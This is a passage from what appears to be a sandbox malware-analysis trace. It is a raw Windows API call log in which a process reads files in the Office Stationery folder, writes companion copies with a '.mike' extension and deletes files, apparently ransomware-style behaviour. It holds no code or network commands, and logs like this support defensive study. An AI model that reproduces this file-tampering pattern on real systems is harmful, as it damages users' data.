lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.601] GetFileType (hFile=0x288) returned 0x1 [0053.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.601] GetFileType (hFile=0x288) returned 0x1 [0053.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.601] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.601] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.602] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), fInfoLevelId=0x0, lpFileInformation=0x215e724 | out: lpFileInformation=0x215e724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb)) returned 1 [0053.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.602] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), fInfoLevelId=0x0, lpFileInformation=0x215ea4c | out: lpFileInformation=0x215ea4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb)) returned 1 [0053.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.602] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.603] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.603] GetFileType (hFile=0x288) returned 0x1 [0053.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.603] GetFileType (hFile=0x288) returned 0x1 [0053.604] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.604] WriteFile (in: hFile=0x288, lpBuffer=0x215f918*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x215f918*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.605] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), fInfoLevelId=0x0, lpFileInformation=0x215f400 | out: lpFileInformation=0x215f400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb)) returned 1 [0053.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.605] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.605] GetFileType (hFile=0x288) returned 0x1 [0053.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.605] GetFileType (hFile=0x288) returned 0x1 [0053.605] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.605] ReadFile (in: hFile=0x288, lpBuffer=0x2160a4c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2160a4c*, lpNumberOfBytesRead=0x2af0c8*=0xeb, lpOverlapped=0x0) returned 1 [0053.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.607] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.607] GetFileType (hFile=0x288) returned 0x1 [0053.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.607] GetFileType (hFile=0x288) returned 0x1 [0053.607] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.607] WriteFile (in: hFile=0x288, lpBuffer=0x2163ce0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2163ce0*, lpNumberOfBytesWritten=0x2af0bc*=0xf0, lpOverlapped=0x0) returned 1 [0053.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.607] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.607] GetFileType (hFile=0x288) returned 0x1 [0053.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.607] GetFileType (hFile=0x288) returned 0x1 [0053.608] WriteFile (in: hFile=0x288, lpBuffer=0x2166f18*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2166f18*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.609] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93cec60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93cec60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93f4dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.609] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2168688 | out: lpFileInformation=0x2168688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93cec60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93cec60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93f4dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", dwFileAttributes=0x80) returned 0 [0053.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.611] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93cec60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93cec60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93f4dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x49 [0053.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x4e [0053.611] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.mike")) returned 1 [0053.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.614] GetFileType (hFile=0x288) returned 0x1 [0053.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.614] GetFileType (hFile=0x288) returned 0x1 [0053.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.615] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.615] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.615] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), fInfoLevelId=0x0, lpFileInformation=0x216b474 | out: lpFileInformation=0x216b474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e)) returned 1 [0053.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.615] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), fInfoLevelId=0x0, lpFileInformation=0x216b79c | out: lpFileInformation=0x216b79c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e)) returned 1 [0053.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program 